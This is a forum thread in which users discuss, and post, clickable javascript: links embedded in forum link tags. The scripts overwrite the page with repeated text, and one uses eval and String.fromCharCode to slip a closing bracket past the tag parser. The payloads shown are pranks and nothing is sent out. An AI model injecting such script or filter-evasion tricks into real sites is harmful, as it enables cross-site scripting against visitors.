so does this mean that any javascript can be used inside a post? if so, then some coder needs to make a script to stop this. otherwise mallicious material could be put in a post. almost like above

It's not any more of a security risk than before. I could have posted a link to some website that had that same script before in v3. [link=javascript:function getRandColor(){var c="000000,808080,ffffff,ff0000,00ff00,0000ff,ffff00,00ffff,ff00ff,009900,660000,000066,0088bb,ff6600,884400";var x=Math.floor(Math.random()*15);eval("var p=c.split(',')[x"+String.fromCharCode(93)+";");return p;}function getRand(max){return Math.round(Math.random()*max);}function california(){for(var a=0;a<4000;a++){document.write('CALIFORNIA');}document.write('CALIFORNIA');}california();]Just be careful what you click on.[/link] (for the record, I discovered this like three weeks ago)

I've been working on it for the past hour trying to do it without using the ] character. Try it now...
Meh, still doesn't work in FF. It works when I copy the script into an HTML file but not from the link anyway. Try it in IE, it's pretty cool...
[link=javascript:function getRandColor(){var c="000000,808080,ffffff,ff0000,00ff00,0000ff,ffff00,00ffff,ff00ff,009900,660000,000066,0088bb,ff6600,884400";var x=Math.floor(Math.random()*15);eval("var p=c.split(',')[x"+String.fromCharCode(93)+";");return p;}function getRand(max){return Math.round(Math.random()*max);}function california(){var you=prompt('Enter Something','');for(var a=0;a<4000;a++){document.write(''+you+'');}document.write(''+you+'');}california();]Here's another one[/link]
